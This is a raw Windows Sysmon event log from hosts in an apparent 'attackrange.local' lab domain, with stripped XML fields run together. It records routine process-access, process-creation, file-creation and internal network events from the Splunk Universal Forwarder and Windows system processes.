08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.345{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F62E156A581412A31A9338067201D4B3,SHA256=B6343DEBAA827C8557F47BB933547E5E4C74460CF619593ACDEB36C64359CD1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:24.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C31950F04A7F6AD22FB7A9C1329ADF,SHA256=CE69565CD361CBA76A9381461AA2E2CC834AA9030F12C08491A9F192A66B3215,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.891{0C1E0330-F6D5-60EB-B479-00000000D001}1544644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=417019E185704B06FA3B506DB28AE096,SHA256=469990C37BF13368F00AE1D067CE58FC0DC64A09BD9B084C7041887152771B73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.719{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.719{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.719{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.720{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=923CB4F0D667D646BE12285618C91AF0,SHA256=27F06980E23D42620B5C45724E2B5662B2B2C2229C9248C8776D9E07289B9960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405F63C43620F942F889F7068F324FD8,SHA256=D434A0FEC8E1EFDB29A4684FC2987B46C90BE75036D5A1B38EEF15B84402CC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:25.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4204339CE5B4912229C07E97391D33C,SHA256=2C759E564BF7F6F934B2568C9EC7B3786B8D6C37814FD5984C2D0B2C19A9CE37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:23.367{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57382-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 